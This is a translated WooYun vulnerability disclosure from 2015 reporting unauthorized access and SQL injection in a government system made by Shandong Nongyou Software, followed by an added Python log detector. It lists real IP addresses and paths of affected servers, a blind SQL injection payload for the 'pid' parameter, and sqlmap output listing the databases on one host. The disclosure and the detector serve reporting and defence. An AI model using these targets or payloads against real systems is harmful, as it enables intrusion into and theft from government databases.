Vulnerability summary

Defect ID: wooyun-2015-089547

Title: A government system: one unauthorized access + one SQL injection

Vendor: 山东农友软件 (Shandong Nongyou Software)

Author: 路人甲

Submitted: 2015-01-06 11:43

Fixed: 2015-04-06 11:44

Published: 2015-04-06 11:44

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Handed over to a third-party partner organisation (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-01-06: Details sent to the vendor, awaiting vendor handling
2015-01-11: Vendor confirmed; details visible to the vendor only
2015-01-14: Details opened to third-party security partners
2015-03-07: Details opened to core white hats and domain experts
2015-03-17: Details opened to regular white hats
2015-03-27: Details opened to intern white hats
2015-04-06: Details opened to the public

Brief description:

As titled.

Detailed description:

Official site of Shandong Nongyou Software: http://www.nongyou.com.cn/
1. Unauthorized access (the jubao pages are reachable without authentication); affected instances:
http://221.2.149.47:8100/jubao/left.aspx
http://222.135.109.70:8100/jubao/left.aspx
http://123.134.189.60:8012/jubao/left.aspx
http://218.56.40.229:8020/jubao/left.aspx
http://222.135.127.190:7000/jubao/left.aspx

(Screenshot: 1.png)


2. One unauthorized-access page that is also injectable:
http://222.135.127.190:7000/jubao/StatisticalAnalysisChart.aspx?pid=
http://221.2.149.47:8100/jubao/StatisticalAnalysisChart.aspx?pid=
http://222.135.109.70:8100/jubao/StatisticalAnalysisChart.aspx?pid=
http://123.134.189.60:8012/jubao/StatisticalAnalysisChart.aspx?pid=
http://218.56.40.229:8020/jubao/StatisticalAnalysisChart.aspx?pid=
Tested injection point: http://123.134.189.60:8012/jubao/StatisticalAnalysisChart.aspx?pid=

(Screenshot: 2.png)


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: pid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pid=' AND 5349=5349 AND 'QMWz'='QMWz
---
[18:13:11] [INFO] testing MySQL
[18:13:11] [WARNING] the back-end DBMS is not MySQL
[18:13:11] [INFO] testing Oracle
sqlmap got a 302 redirect to 'http://123.134.189.60:8012/ErrorPage.htm'. Do you
want to follow? [Y/n] n
[18:13:12] [WARNING] the back-end DBMS is not Oracle
[18:13:12] [INFO] testing PostgreSQL
[18:13:12] [WARNING] the back-end DBMS is not PostgreSQL
[18:13:12] [INFO] testing Microsoft SQL Server
[18:13:12] [WARNING] reflective value(s) found and filtering out
[18:13:12] [INFO] confirming Microsoft SQL Server
[18:13:13] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[18:13:13] [INFO] fetching database names
[18:13:13] [INFO] fetching number of databases
[18:13:13] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[18:13:13] [INFO] retrieved: 12
[18:13:14] [INFO] retrieved: gangchengnl
[18:13:22] [INFO] retrieved: gaoxinqunl
[18:13:31] [INFO] retrieved: kaifaqunl
[18:13:41] [INFO] retrieved: laichengnl
[18:13:51] [INFO] retrieved: laiwunl
[18:13:58] [INFO] retrieved: master
[18:14:03] [INFO] retrieved: model
[18:14:08] [INFO] retrieved: msdb
[18:14:11] [INFO] retrieved: ReportServer
[18:14:21] [INFO] retrieved: ReportServerTempDB
[18:14:36] [INFO] retrieved: tempdb
[18:14:41] [INFO] retrieved: xueyenl
available databases [12]:
[*] gangchengnl
[*] gaoxinqunl
[*] kaifaqunl
[*] laichengnl
[*] laiwunl
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] xueyenl
[18:14:48] [INFO] fetched data logged to text files under 'C:\Documents and Settings\Administrator\.sqlmap\output\123.134.189.60'


All of the listed instances are reproducible.
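As an added example that is not part of the original report, here is a defender-side Python detector that scans IIS W3C log lines for the boolean-based blind probe shape sqlmap reported above against the pid parameter, and counts per client how many probes ended in the 302 to the error page. The log lines, field order and client addresses are constructed assumptions, not data from the affected hosts.

```python
import re
from urllib.parse import parse_qs

# Constructed IIS W3C log sample; the #Fields line gives the column order.
# Client addresses are documentation IPs, not hosts from the report.
SAMPLE_LOG = """#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2015-01-05 18:13:10 GET /jubao/StatisticalAnalysisChart.aspx pid=17 192.0.2.10 200
2015-01-05 18:13:11 GET /jubao/StatisticalAnalysisChart.aspx pid=%27+AND+5349%3D5349+AND+%27QMWz%27%3D%27QMWz 198.51.100.9 200
2015-01-05 18:13:11 GET /jubao/StatisticalAnalysisChart.aspx pid=%27+AND+5349%3D5350+AND+%27QMWz%27%3D%27QMWz 198.51.100.9 302
2015-01-05 18:13:12 GET /ErrorPage.htm - 198.51.100.9 200
"""

# Shape of the payload sqlmap reported above: quote break-out, a numeric
# comparison (true or false branch), then a string comparison whose closing
# quote is supplied by the application's own SQL.
BLIND_RE = re.compile(
    r"""['"]\s*(?:AND|OR)\s+\d+\s*=\s*\d+\s+(?:AND|OR)\s+['"]\w+['"]\s*=\s*['"]\w+""",
    re.IGNORECASE,
)

def parse_w3c(log_text):
    """Yield one dict per record, keyed by the names in the #Fields directive."""
    fields = None
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            yield dict(zip(fields, line.split()))

def find_blind_probes(log_text):
    """(client, parameter, decoded payload, status) for each probe-shaped query."""
    hits = []
    for rec in parse_w3c(log_text):
        if rec["cs-uri-query"] == "-":      # IIS writes '-' for an empty query
            continue
        for name, values in parse_qs(rec["cs-uri-query"], keep_blank_values=True).items():
            for value in values:            # parse_qs already URL-decodes the value
                if BLIND_RE.search(value):
                    hits.append((rec["c-ip"], name, value, int(rec["sc-status"])))
    return hits

def probes_per_client(log_text):
    """Per-client probe and 302 counts: a client alternating 200/302 on one
    parameter is a blind-injection tool comparing true and false responses."""
    summary = {}
    for client, _, _, status in find_blind_probes(log_text):
        entry = summary.setdefault(client, {"probes": 0, "redirects": 0})
        entry["probes"] += 1
        entry["redirects"] += int(status == 302)
    return summary
```

Pointing the same functions at real IIS logs only requires that the #Fields line be present, as IIS writes it at the top of each log file.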

Proof of vulnerability (identical to the sqlmap run shown in the detailed description above):


Fix recommendation:

Assign permissions properly and validate input parameters.

Copyright notice: when reposting, credit the source: 路人甲@乌云 (WooYun)


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 14

Confirmed: 2015-01-11 10:31

Vendor reply:

Latest status:

None yet